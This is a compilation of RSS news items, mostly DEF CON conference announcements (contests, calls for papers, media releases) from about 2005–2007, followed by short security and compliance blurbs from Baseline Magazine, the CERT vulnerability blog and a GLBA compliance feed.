https://www.defcon.org/defconrss.xml Announcing Brew Wars for DC 15! It's time to remind everyone of Brew Wars again. The very first Brew Wars will happen this year at Defcon 15. The rules are simple. Just bring twenty-four ounces of your home brew to Defcon. A judging panel of three people, including myself, will drink and rate each brew. The beer will be rated on a scale of 1-10. Each beer will be judged in its category. The standard of each category of beer is last year's winner of the Great American Beer Festival in the style you have entered. A list of those winning beers can be found at the URL below. http://www.beertown.org/events/gabf/...medalists.aspx The judges will be blind tasting the beers. The only information given to the judges will be what style of beer it is. Judges will not be allowed to enter their own brews. Judges have already been selected. All judges were at the GABF and sampled all winning brews. Extensive tasting notes were taken at the time. I have sourced a glass carboy for the winner. This carboy will be etched with a logo commemorating the event. If your beer is good enough, you could soon be brewing your next batch in a unique carboy. Dr. Faustus

==> Robot Wars Arena Updated!

https://www.defcon.org/defconrss.xml Arena Updated! We've started building the new arena for this year's robot contest. The details about the arena and the build photos are here: http://defconbots.org/defcon15/arena.php So now that it's (almost) done, teams are invited to come practice on the actual arena if you want to get yourself to Orange County, CA :) If anyone has questions or if you need more detailed photos, please let me know! Kallahar

==> Contests starting up for DEFCON 15!

https://www.defcon.org/defconrss.xml DEFCON 15 Contests are starting to get organized! Interested in running a contest or competing in one? Check out the current list of what's happening over on the forums. Capture the Flag is back in full force, the Toxic BBQ is in effect, the Black and White Ball will happen as usual, and a whole host of new contests are getting ready. Some of them include:
- The Amateur CtF
- Beverage Cooling Contest
- Brew Wars!
- Coffee Wars
- DefconBots Robot Contest
- Hacker Jeopardy
- Lockpicking Contest
- LosT @ Con Mystery Challenge
- QueerCon
- Spot the Fed
- The Summit meeting and party
- Sushicon
- Wireless Village, Lockpick Village and RFID village!
- Sekret Challenge!

==> DEFCON 15 CFP Now Open!!

https://www.defcon.org/defconrss.xml DEFCON 15 Call For Papers is now officially open and will close on June 15, 2007. Don't know what DEFCON is? Go to https://www.defcon.org/ and clue up! Papers and presentations are now being accepted for DEFCON 15, the conference your mother and ISC(2) warned you about. DEFCON will take place at the Riviera in Las Vegas, NV, USA, August 3-5, 2007. Last year, we eliminated speaking tracks, and we received a diverse selection of submissions: from hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We group presentations by subject and come up with topic areas of interest. It worked out so well in the past that we are doing it again. What are we looking for then, if we don't have tracks? We're looking for the presentation that you've never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn't ask for, but that blows their minds when they see it. We want strange demos of personal GPS jammers, RFID zappers, and HERF madness. Got a MITM attack against cell phones? We want to see it. 
Subjects that we have traditionally covered in the past, and will continue to accept, include: Trojan development, worms, malware, intelligent agents, protocol exploits, application security, web security, database hacking, privacy issues, criminal law, civil law, international law/treaties, prosecution perspectives, 802.11X, bluetooth, cellular telephony protocols, privacy, identity theft, identity creation, fraud, social implications of technology, media/film presentations, firmware hacking, hardware hacking, embedded systems hacking, smartcard technologies, credit card and financial instrument technologies, surveillance, counter-surveillance, UFOs, peer2peer technologies, reputation systems, copyright infringement and anti-copyright infringement enforcement technologies, critical infrastructure issues, physical security, social engineering, academic security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST technologies, corporate espionage, IDS evasion. What a mouthful! Well, you can't say we didn't give you some ideas. This list is not intended to limit possible topics, merely to give examples of topics that have interested us in the past, and is in fact the same list we used last year. Check out https://www.defcon.org/html/defcon-14/dc-14-speakers.html for past conference presentations to get a complete list of past topics that were accepted, if you want to learn from the past. We are looking for and give preference to: unique research, new tool releases, zero-day attacks (with responsible disclosure), highly technical material, social commentaries, and ground-breaking material of any kind. Want to screen a new hacking documentary or release research? Consider DEFCON. Speaking Formats: Choose between 12 hundred seconds, 50 minutes, 110 minutes, or a break-out format of a length you determine. 
We are continuing the Twelve Hundred Second Spotlight, which is a shorter presentation (about twenty minutes) that doesn't warrant a full 50 or 110 minute talk. The Twelve Hundred Second Spotlight is designed for those who don't have enough material for a full talk, but still have a valuable contribution to make. This is to ensure that great ideas that can be presented quickly don't fall through the cracks merely because they didn't justify a full length talk. Examples include research, announcements, group presentations, projects needing volunteers or testers, requests for comments, updates on previously given talks, quick demonstrations. You get the idea. Presenters will get a speaker badge which entitles them to free admittance to DEFCON, but we will be unable to pay an Honorarium. Remember being attacked by flying meat? Do you remember thick accented Germans trying to convince you to attack critical infrastructure? Do you remember extravagant vaporware releases by a stage filled with posses? We do, and sans projectiles of raw meat we want to encourage such shenanigans again this year. We are calling on all "hacker groups" (you know who you are, and the FBI has a nifty file with your name on it) to present at DEFCON, to discuss what you're up to, what your mission is, to discuss any upcoming or past projects, and to discuss parties/conferences you are throwing. We do humbly request that all gang warfare be relegated to electronic attacks, and not fall over into meatspace. New for DEFCON 15: The second year being at the Riviera has allowed us to make some changes to the format from last year. We have more speaking rooms, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits, this might be the format for you.
You tell us how much time you need, and we try to accommodate you! To submit a speech, complete the Call for Papers Form at: https://www.defcon.org/html/defcon-15/dc-15-cfp-form.html and send to talks at defcon dot org. You will receive a confirmation within 48 hours of submission. We are going to continue last year's goal of increasing the quality of the talks by screening people and topics. I realize you guys are speaking for basically free, but some talks are better than others. Some people put in a bit more effort than others. I want to reward the people who do the work by making sure there is room for them. This year we will have two rounds of speaker acceptance. In the first round we will fill about half of the schedule before the submission deadline, and the remaining half afterwards. This is to encourage people to submit as early as possible and allows attendees to plan on the topics that interest them. If you see the schedule on-line start to fill, do not worry if you have not heard from us yet, as we are still in the process of selection. Barring a disaster of monstrous proportions, speaker selection will be completed no later than July 1. The sooner you submit, the better chance you have that the reviewers will give your presentation the full consideration it warrants. If you wait until the last minute to submit, you have less of a chance of being selected. After a completed CFP form is received, speakers will be contacted if there are any questions about their presentations. If your talk is accepted you can continue to modify and evolve it up until the last minute, but don't deviate from your accepted presentation. We will mail you with information on deadlines for when we need your presentation, to be burned onto the CD-ROM, as well as information for the printed program. Speakers get in to the show free, get paid (AFTER they give a good presentation!), get a coolio badge, and people like you more.
Heck, most people find it is a great way to meet people or find other people interested in their topics. Speakers can opt to forgo their payment and instead receive three human badges that they can give to their friends, sell to strangers, or hold onto as timeless mementoes. Receiving badges instead of checks has been a popular option for those insisting on maintaining their anonymity. Please visit: https://www.defcon.org/ for previous conference archives, information, and speeches. Updated announcements will be posted to news groups, security mailing lists and this web site. https://forum.defcon.org/ for a look at all the events and contests being planned for DEFCON 15. Join in on the action. https://pics.defcon.org/ to upload all your past DEFCON pictures. We store the pictures so you don't have to worry about web space. If you have an account on the forums, you have an account here. https://www.defcon.org/defconrss.xml for news and announcements surrounding DEFCON. CFP forms and questions should get mailed to: talks/at/defcon.org

==> CSI: TCP/IP by Robin Mejia at wired.com

https://www.defcon.org/defconrss.xml "Keep your friends close and your enemies closer. Why the Pentagon's toughest Internet crime fighter likes hanging out with blackhat hackers" is the subtitle of the article. It turns out to be a well written piece about Jim Christy's career and the birth of the DoD Cybercrime Center. It is set to a backdrop of DEF CON 14, and has a couple funny bits, some interesting war stories plus a quote from me. A snip from the article: "Christy points out a pulsing vein in the guy's neck suggesting it's a sign he is lying. The guy calls Christy an old man. He hints that maybe he might have some small connection to Mossad. As he finally sits down, Christy passes him a business card."

==> Don't Be a Slacker, DEFCON 15 WANTS YOU!

https://www.defcon.org/defconrss.xml Starting March 1st we will be opening the call for papers for DEFCON 15 - the annual gathering of subversive computer folks. Earlier submissions are given higher priority, so prepare your best kung-foo, and send it our way. Remember, we are always looking for original and highly technical content, unusual subject matters, software releases, innovative hardware hacking, and generally mind-blowing content. Check out past convention archives to get an idea of what we are talking about. Once the date is closer there will be more specifics. I just wanted to give everyone a heads up!

==> DEFCON 14 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the second batch of content from DC-14 encoded for download. This marks the third step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The new media server will be going on-line in the next month, and because the old media server is out of drive space you will notice that all DC 7 content has been taken off line to make room. Once the new media server is on-line all past content will be restored!

==> DEFCON 14 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-14 encoded for download. This marks the third step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> Happy Holidays!

https://www.defcon.org/defconrss.xml Happy Holidays from all of us here at Defcon! We would like to wish you the best this Holiday season. We hope you have plenty of family, food and fun to go around. If you get bored you can always gather the family around the warm glow of your flat screen to watch the ghosts of presentations past. There is no better gift than that. Unless of course your loved ones headed over to Jinx and got you some sweet Defcon gear! We also wanted to remind you that pics.defcon.org is up and running, we are looking forward to seeing it grow with the new year. If you get together with your fellow hackers this holiday season, or mod that must have Christmas gift, feel free to upload your photos in the members and dc groups galleries. That said, Eat plenty of other peoples food, stay up late with your new shiny toys and have fun with friends and family. See you next year!

==> DEFCON 14 Presentations On-Line!

https://www.defcon.org/defconrss.xml We've gotten in some updated presentations, and have updated www.defcon.org to make them all available. So if you want to see the slides to a preso you missed, check out the link below. Next up we'll be posting the audio and video from DC-14 for download. DEF CON's XMas present to the community, coming in December.

==> pics.defcon.org now live!

https://www.defcon.org/defconrss.xml pics.defcon.org is now live for use. What is it you ask? Think of it as a repository for all pictures related to DEF CON. It is a place you can upload your pictures and arrange them however you want. Others can comment on them, vote, or put them in their own favorites album. The idea is that as people change providers there is no long term repository for DEF CON pictures except to the links www.defconpics.org points to. Because they don't mirror the content I wanted to create a free place for people to share their pictures that won't change or go down. The pics software is integrated with the defcon forums, so if you already have an account there you automatically have an account on pics.defcon.org. So get busy! Upload those pictures. Both http and https connections work. Spread the word!

==> DEFCON 12 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-12 encoded for download. This marks the second step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> DEFCON 12 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the second batch of content from DC-12 encoded for download. This marks the second step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> DEFCON 13 Videos of the Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml Here are the music videos of the music from the Black and White Ball at DEFCON 13. DJs include Wintamute, Ms. Jackalope, Shatter, Kris Klink and Casey with the bands Catharisis and Regenerator in the house!

==> DEFCON 13 Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml We took the audio .wav files and encoded them into .mp3 files. DJs include Wintamute, Ms. Jackalope, Shatter, Kris Klink and Casey with the bands Catharisis and Regenerator in the house!

==> DEFCON 14 Speakers Selected!

https://www.defcon.org/defconrss.xml Hey everyone, I want to make some announcements surrounding DEFCON 14. It's about that time to briefly lay down the inf0z, so here it goes.
- Speakers have been selected, and are now listed on-line: http://www.defcon.org/html/defcon-14/dc-14-schedule.html They include an assistant Secretary of Defense, an FBI agent, Scary Hackers, privacy fanatics, security studs, and a hardware hacking ninja.
- The con hotel is sold out, but overflow exists here: http://www.defcon.org/html/defcon-14/dc-14-hotel.html
- Need a ride or got a room to spare? Check out the ride and room section of the DEF CON Forums: https://forum.defcon.org/forumdisplay.php?f=26
- There are a lot of new contests, and some old ones that are no more (we'll miss you, WiFi Shootout!). I'd mention them all, but it takes up too much space. To get a good grip on what is happening I'd suggest reading the contest area of the forums: https://forum.defcon.org/forumdisplay.php?f=102
- The Black and White Ball is two nights this year, with some great bands and DJs including Regenerator, The Minibosses, DJ Jackalope, Catharsis and DJ Wintamute.
- DEF CON 13 Audio and Video is now on-line for DOWNLOAD. Yep, you saw that right. We are phasing out the real media server and going to download mode. The audio is in .mp3, and the video is in H.264 2-pass 192k .mp4, optimized for the iPod video screen size. Right now you gotta subscribe to the RSS feed, but the web site will soon sport the direct links. We hope to have DC-12 on-line in the next week. http://www.defcon.org/defconrss.xml
Notes: This year we are at a new hotel, the Riviera. I did this because DEF CON was going to stagnate and die if it stayed at the Alexis Park any longer. The benefits of the new hotel are that the speaking rooms are larger, there is air conditioning, and we have room to grow. This year we get about 1/2 the space, and next year we should get 3/4 of the space.
That extra room will allow us to offer break out classes, get togethers, and an additional track of speaking. Things we could only dream of before, but now are possible. It will take us all a year or two to learn what to do with all the space, but those are the kinds of problems I can live with. Did I mention the sky boxes? General hang out site: http://forum.defcon.org/ Remember DEF CON is what you make of it, and we have been lucky over the years to have a great group of people supporting us. The line up this year looks great, and the rest is up to us.

==> Crypto utopia Sealand ravaged by fire by Andrew Orlowski

https://www.defcon.org/defconrss.xml Andrew over at The Register writes about a fire that broke out on Sealand, wrecking the generator room. For those not familiar, there was a talk by Ryan Lackey of HavenCo, a company set up on Sealand to provide privacy services. I believe it inspired some of the characters in Neal Stephenson's Cryptonomicon book (go read it, it's very good). I've wondered what happened since the business imploded in 2003, but from the article it seems not much. "Fire has damaged a World War II gun emplacement seven miles off the English coast. Better known as 'Sealand', the fort was acquired in the 1960s by Roy Bates, who declared it an independent principality." "In a presentation to the 2003 DefCon convention, a former employee described how internal politics and a lack of investment backing had thwarted the experiment. Contracts were broken, the bandwidth never materialised, and the location was vulnerable to DOS attacks. At the time of his 2003 presentation, HavenCo had no new customers, and had seen several of its existing customers leave."

==> DEFCON 12 Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml We took the audio .wav files and encoded them into .mp3 files. We are working on DC-13 music next!

==> Cybersecurity contests go national by Robert Lemos

https://www.defcon.org/defconrss.xml I saw this over on SecurityFocus written by Rob Lemos, a long time Info Sec reporter with a solid reputation. It is a piece about how "Cybersecurity" events are going national. From old CTF games, to DEFCON, to the Cyber Defense Exercise (CDX) to the new CCDC, it is all a progression of learning through different game challenges. It makes a couple brief mentions of DEFCON, but does not explain who or what we are. That's OK. If people really want to know, they'll find us. From the article: "'As the hackers came in, you could see (the students') reactions: They were frustrated when they saw the attackers breach their systems and excited when they stopped the attack,' said John Carr, a mentor for the team fielded by Valley High School of West Des Moines and senior solutions consultant with Iowa-based technology consulting firm QCI."

==> DEFCON 13 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-13 encoded for download. This marks the first step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The second release is .mp3 audio files in a friendly CBR 64k format. As time goes on we will be re-encoding all previous conference content and releasing it! Next up DEFCON 13 DJ music and video.

==> Database giant and British hacker make amends.

https://www.defcon.org/defconrss.xml By Robert McMillan at Computerworld, some words about database security researchers and Oracle. DEFCON devotees may well recognize David's and Caesar's contributions to this space. Oracle once marketed its database as unbreakable, but security researcher David Litchfield has a less inflated opinion of the software. "God forbid that any of our critical national infrastructure runs on this product," he said recently on the widely read Bugtraq security mailing list. Oops, it does.

==> Ride and Room sharing forum now open

https://www.defcon.org/defconrss.xml Going to DEFCON 13? Want to share a ride or a room? Got extra space in your car or room? Now is your chance to find others and make new friends. From TheCotMan's post about this: Suggestions: Your best bet in finding a ride, or room sharing is actually found by attending your local Defcon User Group, getting to know people in person, who then may give you space in their room. Trying to hook up with people on the Defcon Forums is a tricky thing. Generally, strangers won't offer other strangers space in their room. People will want some sort of references-- someone both parties know and trust to vouch for you. The Unofficial Defcon Faq http://defcon.stotan.org/faq/ was written by many, and assembled by HighWizard. It has some outdated information for when the convention was at the Alexis Park but also has some useful information about room sharing, and life at Defcon. Good luck.

==> DEFCON 13 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-13 encoded for download. This marks the first step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The first release is .mp4 video files in an iPod friendly h.264 format. Soon to follow will be the .mp3 versions of all the same presentations. As time goes on we will be re-encoding all previous conference content and releasing it!

==> DEFCON 14 Speaker Selection now underway.

https://www.defcon.org/defconrss.xml The speaker selection process for DEFCON 14 is now underway, with early selections being made. While the CfP closes officially in two weeks, we are doing early selection to fill half the speaking spots now to speed things up. We will try very hard to have the process completed in two weeks, right at the end of the deadline. We'll be making announcements on-line as well as on forums and mailing lists. If you submitted a talk, look for acceptance or rejections over the next two weeks in your email. I am proud to say some of the submissions this year are of very high quality, and we should break in the Riviera with some killer content. As usual we are talking about the con over on the forum.defcon.org system.

==> www.defcon.org now serving compressed content!

https://www.defcon.org/defconrss.xml Well it has taken a bit of work to get the old web server happy with serving http 1.1 compressed content, but now that it is you should see a speed improvement in page views as well as availability. These changes are in preparation for the site and server change over, something that I hope will happen in the next week. If your browser supports content-encoding compressed, you should see a gain! Also note that forums.defcon.org is also enabling compression later this week after some testing. This is a good thing leading up to the convention because it is effectively like buying more bandwidth with a software upgrade.

==> Capture the Flag pre-qualification opens!

https://www.defcon.org/defconrss.xml From Kenshoto's announcement: Once again ... kenshoto will be running the Defcon Capture the Flag contest in 2006. This year's CtF will be a knock-down-drag-out-cyberninja war, the likes of which the world has never seen (except maybe last year). For the qualifying round, we've widened the scope from last year. With multiple challenges in various categories, there's something for every hacker, regardless of skillset (except running scripts and writing perl). The core skill for this contest will be finding vulnerabilities in software. Those of you who have avoided playing in CtF because you think it is for lamers, we bet you can't find all our vulnerabilities. Teams will still need to defend a server, and will need to be able to exploit the vulnerabilities they find. As last year, the vulnerabilities will be 100%-custom, so leave your nessus, metasploit and core impact bleep at home. There will be a qualifying round, which will start on Friday, June 9th at 10:00 PM EDT. Only 8 teams will qualify. Last year's winners, Shellphish, are automatically qualified (leaving 7 team slots), unless they too decide to play in the qualifying round, in which case they will still need to place in the top 8. Registration is currently open at http://kenshoto.com/quals/ We encourage anyone (even individuals) to attempt to qualify, even if as a learning experience. We intend quals to be enjoyable for everyone, regardless of your plans for Defcon. Challenges will range wildly in difficulty; from Mitnick to Eagle, we've got it all. Good luck... you're going to need it. -kenshoto

==> DEFCON 14 CfP Closes at the end of the month!

https://www.defcon.org/defconrss.xml The Call for Papers for DEFCON 14 is closing soon. June 15th is the cut off date, but we will start making early speaking selections in the next two weeks.

==> Most lengthy DC trip report, ever. (warning, pdf)

https://www.defcon.org/defconrss.xml Want to get a group's perspective of DC13? While this 133 page .pdf is largely copied from various speeches, there are some pretty pictures, and the various contributors to the report did a good job. It must have been some work to put together. Check it out, and if you know of other reports like this one, please let us know.

==> DEFCON 14 Beta FAQ v0.95 Now Available!

https://www.defcon.org/defconrss.xml An update to the official FAQ talking about DEFCON and DEFCON 14. Questions and Answers about the new hotel location, costs, events, resources and more. The next update will include a split into two FAQs. One for general DEFCON questions, and one for DEFCON 14.

==> DEFCON places below pumpkin hurling contest!

https://www.defcon.org/defconrss.xml Who hails DEFCON as a noncommercial event, calls its attendees 'digital cognoscenti', throws in an oblique Linus bleep quote, and places DC as the 8th best North American geek fest? Follow the link to find out!

==> DEFCON 14 Call for Papers Open!

https://www.defcon.org/defconrss.xml We are opening the call for papers for DEFCON 14 - the annual gathering of subversive computer folks. Earlier submissions are given higher priority, so prepare your best kung-foo, and send it our way. Remember, we are always looking for original and highly technical content, unusual subject matters, software releases, innovative hardware hacking, and generally mind-blowing content. Check out past convention archives to get an idea of what we are talking about.

==> Getting a job as a Pen-Tester, DEFCON style

https://www.defcon.org/defconrss.xml If you thought being a pen-tester required knowledge, skill, and professionalism, Dmitri sets the record straight. His step-by-step tutorial will teach you how to write incoherent emails, slap imposing stickers on your notebook, and mumble with enough techno-bleep to become a world-renowned pen-tester at a big-name firm. Check out Dmitri's blog for the full article.

==> Trends of 2006 - Stealth Rootkit techniques as introduced at DC13 by Sherri Sparks and Jamie Butler

https://www.defcon.org/defconrss.xml Dennis Moreau, CTO of Configuresoft Inc, discusses security trends likely to appear in the coming year. In addition to discussing the limitations to black-list based security technologies, he highlights a dramatic DEFCON 13 speech. Sherri Sparks and Jamie Butler presented "Shadow-Walker" Raising The Bar For Rootkit Detection.

==> Global Capture the Flag comes to the classrooms worldwide

https://www.defcon.org/defconrss.xml 22 student teams from 18 universities on four continents competed in the largest Capture the Flag event ever attempted. Inspired by DEFCON's CTF and organized by DEFCON CTF winner Professor Vigna, the CTF event differed from DEFCON's contest by not limiting the number of teams and by having international participation. Vigna's page describes his contest in enough detail to allow others to set up their own contests.

==> Renderman to the rescue!

https://www.defcon.org/defconrss.xml Renderman, winner of various contests at DEFCON, is written about in this article. "A Las Vegas magazine once described Renderman as 'infamous,' which he admits was flattering. He's only famous to other hackers."

==> DEFCON Staff, Speakers release new book "OS X for Hackers at Heart"

https://www.defcon.org/defconrss.xml Longtime DEFCON staffer Chris Hurley collaborates with DEFCON Speakers Bruce Potter, Johnny Long, and Ken Caruso to produce "OS X for Hackers at Heart."

==> DEFCON.ORG now SSL enabled!

https://www.defcon.org/defconrss.xml DEFCON.ORG is now SSLorized for your enhanced privacy and crypto happiness. Also SSL enabled for more private discussions - forum.defcon.org.

==> DEFCON 13 Write-up in the current issue of Blacklisted! 411

https://www.defcon.org/defconrss.xml The fall 2005 issue of Blacklisted! 411 has an extensive six page write-up of DEFCON that's worth reading. If you've never read Blacklisted, you should - it's a worthy mag.

==> DEFCON 14 Beta FAQ v0.91 Now Available!

https://www.defcon.org/defconrss.xml The first official FAQ talking about DEFCON, and DEFCON 14. Questions and Answers about the new hotel location, costs, events, resources and more. Please check it out and provide feedback so we can get a really solid v 1.0 FAQ out by the end of the year!

==> HP fires real bullet at Storageworks array

https://www.defcon.org/defconrss.xml Charlie Demerjian over at the Inquirer has a piece about HP shooting a .308 bullet at an XP12000 storage array, and the array still functioning. I have questions about where the bullet actually went, I mean if it smashed all the controller cards or went through the power supplies it wouldn't still function. But hey! They got it just right. The best part, though, is the end. 'The XP12000 was then brought back to a fully functional state without any loss of uptime. Not bad at all. As far as I know, this is the only test of its type, but I am sure we could arrange something similar at DefCon if Sun wants to loan us a 15K.'

==> DNS and Site Updates

https://www.defcon.org/defconrss.xml As DEFCON 14 gets closer, I plan on making some major network changes to better support the convention. I plan on moving the web site, forum, and store to new servers and ip addresses in the next month. Shortly after that I will be upgrading the media server and starting to release past conference archives for download. That is right, you read it here! No more real media streaming, soon you will be able to D/L the files directly in h.264 (Video iPod compatible) format. So this is just a heads up that things will be switching around over the next month or so.

==> The Hidden Threats of Security Certificates

http://www.baselinemag.com/rss-feeds-65.xml Until the Flame malware incident, many IT leaders had been unaware of a hidden danger in their security infrastructure: ineffective certificate management.

==> Data Breaches Grow ... and Grow More Serious

http://www.baselinemag.com/rss-feeds-65.xml As networks and computer systems grow more sophisticated, cyber-crooks are keeping pace and finding new ways to exploit weaknesses. The recently released 2012 "Data Breach Investigations Report", along with industry snapshots from Verizon Communications, offers insights into the current state of security. It found that corporate data theft reached 855 incidents and 174 million compromised records over the last year. "Mainline cyber-criminals are achieving 'economies of scale' by automating and streamlining highly repetitive—but quick and effective—attack methods," explains Wade Baker, principal author of the Verizon Data Breach Investigations Report series. "Organizations achieve very high levels of security in numerous areas but neglect others." Many of those attacks targeted trade secrets, classified information and other intellectual property, Verizon found. The instigators relied on a number of methods—including hacking, physical security breaches and social engineering—to extract the data they desired. Here are some of the highlights (or lowlights) from the report.

==> Forking and Joining Python Coroutines to Collect Coverage Data

http://www.cert.org/blogs/vuls/rss.xml In this post I'll explain how to expand on David Beazley's cobroadcast pattern by adding a join capability that can bring multiple forked coroutine paths back together. I'll apply this technique to create a modular Python script that uses gcov, readelf, and other common unix command line utilities to gather code coverage information for an application that is being tested. Along the way I'll use ImageMagick under Ubuntu 12.04 as a running example.

==> A Look Inside CERT Fuzzing Tools

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Allen Householder of the CERT Vulnerability Analysis team. If you've been following this blog for a while, you are probably familiar with our fuzzing tools: Dranzer, the CERT Basic Fuzzing Framework (BFF), and the CERT Failure Observation Engine (FOE). While creating tools that can find and analyze vulnerabilities makes up a significant portion of our work in the CERT Vulnerability Analysis team, our focus is on developing and communicating the knowledge we've built into those systems. To that end, we recently published a pair of reports that describe a few of the heuristics and algorithms implemented in the BFF and FOE fuzzing tools. We briefly mentioned these techniques in the release announcements for the tools, but did not describe how they work in detail. Abstracts and links to the reports can be found below.

==> Updates to CERT Fuzzing Tools (BFF 2.6 & FOE 2.0.1)

http://www.cert.org/blogs/vuls/rss.xml Hi everybody. Allen Householder from the CERT Vulnerability Analysis team here, back with another installment of "What's new in CERT's fuzzing frameworks?" Today we're announcing the release of updates of both our fuzzing tools, the CERT Basic Fuzzing Framework (BFF) version 2.6 and the CERT Failure Observation Engine (FOE) version 2.0.1. The remainder of this post describes the changes in more detail.

==> Java 7 Attack Vectors, Oh My!

http://www.cert.org/blogs/vuls/rss.xml While researching how to successfully mitigate the recent Java 7 vulnerability (VU#636312, CVE-2012-4681), we (and by "we" I mean "Will Dormann") found quite a mess. In the midst of discussion about exploit activity and the out-of-cycle update from Oracle, I'd like to call attention to a couple other important points.

==> The Report "Network Profiling Using Flow" Released

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Austin Whisnant of the CERT Network Situational Awareness Team (NetSA). After a long time in the making, NetSA has published an SEI technical report on how to inventory assets on a network using network flow data. Knowing what assets are on your network, especially those visible to outsiders, is an important step in gaining network situational awareness.

==> Java Security Manager Bypass Vulnerability

http://www.cert.org/blogs/vuls/rss.xml Last Sunday, another major Java vulnerability (VU#636312) was reported. Until an official update is available, we strongly recommend disabling the Java 7 plug-in for web browsers.

==> CERT Failure Observation Engine 2.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder from the CERT Vulnerability Analysis team here. Back in April, we released version 1.0 of the CERT Failure Observation Engine (FOE), our fuzzing framework for Windows. Today we're announcing the release of FOE version 2.0. (Here's the download.) Although it has only been a few months since we announced FOE 1.0, our development cycle is such that FOE 2.0 actually reflects nearly a year of additional improvements over the 1.0 release. Our main focus in developing FOE 2.0 was to apply what we learned from creating the CERT Basic Fuzzing Framework version 2.5 for Linux and OS X to improve our fuzzing capabilities on Windows. We are gradually converging our code bases for BFF and FOE to simplify maintenance and the incorporation of new features. We're not quite there yet, but FOE 2.0 reflects a significant step in that direction. Read on for more details.

==> Vulnerability Data Archive

http://www.cert.org/blogs/vuls/rss.xml With the hope that someone finds the data useful, we're publishing an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database.

==> CERT Basic Fuzzing Framework 2.5 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder here. In addition to the recent introduction of our new Failure Observation Engine (FOE) fuzzing framework for Windows and Linux Triage Tools, we have updated the CERT Basic Fuzzing Framework (BFF) to version 2.5. This post highlights the significant changes.

==> CERT Linux Triage Tools 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml As part of the vulnerability discovery work at CERT, we have developed a GNU Debugger (GDB) extension called "exploitable" that classifies Linux application bugs by severity. Version 1.0 of the extension is available for public download here. This blog post contains an overview of the extension and how it works.

==> Vulnerability Severity Using CVSS

http://www.cert.org/blogs/vuls/rss.xml If you analyze, manage, publish, or otherwise work with software vulnerabilities, hopefully you've come across the Common Vulnerability Scoring System (CVSS). I'm happy to announce that US-CERT Vulnerability Notes now provide CVSS metrics.

==> CNAME flux

http://www.cert.org/blogs/vuls/rss.xml Hello, this is Jonathan Spring. Recently, Leigh Metcalf and I uncovered some interesting results in our continuing work on properties of the Domain Name System (DNS). Our work involves an unconventional use of CNAME (canonical name) records. Besides an IP address, CNAME records are the only other location a domain may have in the DNS. Instead of an IP address, a CNAME record is a redirection or alias service that points to another name.

==> Challenges in Network Monitoring above the Enterprise

http://www.cert.org/blogs/vuls/rss.xml Recently George Jones, Jonathan Spring, and I attended USENIX Security '11. We hosted an evening Birds of a Feather (BoF) session where we asked a question of some significance to our CERT® Network Situational Awareness (NetSA) group: Is Large-Scale Network Security Monitoring Still Worth Effort?

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Upgraded Version of WebSearch Launched by DocuLex

http://www.compliancehome.com/rss/resources-GLBA.xml DocuLex, a content management software provider, has introduced WebSearch version 4.2, which adds features such as customized business processes and collaborative workflow capability. WebSearch version 4.2 is part of the DocuLex Archive Studio product line and helps organizations with decision making by automating any business process through systematic workflow.

==> Model Consumer Privacy Notice Online Form Builder Released by Federal Regulators

http://www.compliancehome.com/rss/resources-GLBA.xml An Online Form Builder that financial institutions can download and use to develop and print customized versions of a model consumer privacy notice has been released by eight federal regulators, including the Federal Reserve Board and the Federal Trade Commission. The form builder, based on the model form regulation published in the Federal Register on Dec. 1, 2009, under the Gramm-Leach-Bliley Act (GLBA), is available with several options. The form builder guides an institution to select the version of the model form that fits its practices, such as whether the institution provides an opt-out for consumers.

==> ACA-Supported Gramm-Leach-Bliley Reforms Passed by U.S. House

http://www.compliancehome.com/rss/resources-GLBA.xml The U.S. House of Representatives passed H.R. 3506 by voice vote on the Suspension Calendar on April 14, 2010, a positive policy step forward for our industry. H.R. 3506, which was sponsored by Representatives Erik Paulsen (R-MN) and Dennis Moore (D-KS), removes burdensome requirements under the Gramm-Leach-Bliley Act (GLBA).

==> Advisers Must Know the Ways to Protect Clients' Privacy

http://www.compliancehome.com/rss/resources-GLBA.xml As more and more personal financial information is transmitted online and stored electronically, concerns about privacy and data protection have grown. For financial advisers, privacy issues will only become more important as technology and new types of media proliferate.

==> Reasons Why the U.S. Won't Be Prepared For Cyberwar by Rockefeller-Snowe's Regulations

http://www.compliancehome.com/rss/resources-GLBA.xml Sens. Jay Rockefeller (D-W. Va.) and Olympia Snowe (R-Maine) have formulated a new cybersecurity bill that they described in Friday's Wall Street Journal. (Use Google News to get to the full article.) The bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the U.S. for cyberwar.

==> GLBA Privacy Notices At Last Get Overhauled

